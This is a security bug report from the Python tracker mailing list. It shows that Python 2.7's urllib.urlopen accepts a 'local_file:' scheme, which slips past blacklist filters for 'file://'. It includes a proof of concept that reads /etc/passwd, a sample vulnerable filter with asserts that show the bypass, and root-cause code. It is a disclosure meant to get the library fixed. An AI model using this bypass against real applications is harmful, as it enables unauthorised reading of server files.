New submission from Sihoon Lee <[email protected]>:
The Unnecessary scheme exists in urlopen() urllib
when people would protect to read file system in HTTP request of urlopen(),
they often filter like this against SSRF.
# Vulnerability PoC
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
the result is
##
# User Database
#
# Note t
but if we use a scheme like this, parsing URL cannot parse scheme with
urlparse()
this is the parsed result.
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='',
query='', fragment='')
def request(url):
from urllib import urlopen
from urlparse import urlparse
result = urlparse(url)
scheme = result.scheme
if not scheme:
return False #raise Exception("Required scheme")
if scheme == 'file':
return False #raise Exception("Don't open file")
res = urlopen(url)
content = res.read()
print url, content[:30]
return True
assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False
if they filter only file://, this mitigation can be bypassed against SSRF.
with this way.
assert request('local-file:/etc/passwd') == True
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='',
query='', fragment='')
parseing URL also can be passed.
# Attack scenario
this is the unnecessary URL scheme("local_file").
even if it has filtering, An Attacker can read arbitrary files as bypassing
with it.
# Root Cause
URLopener::open in urllib.py
from 203 lin
name = 'open_' + urltype
self.type = urltype
name = name.replace('-', '_') #it can also allows local-file
if not hasattr(self, name): #passed here hasattr(URLopener, 'open_local_file')
if proxy:
return self.open_unknown_proxy(proxy, fullurl, data)
else:
return self.open_unknown(fullurl, data)
try:
if data is None:
return getattr(self, name)(url)
else:
return getattr(self, name)(url, data) #return URLopener::open_local_file
it may be just trick because people usually use whitelist (allow only http or
https.
Even if but anyone may use blacklist like filtering file://, they will be
affected with triggering SSRF
----------
components: Library (Lib)
messages: 334905
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Unnecessary URL scheme exists to allow file:// reading file in urllib
type: security
versions: Python 2.7
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue35907>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
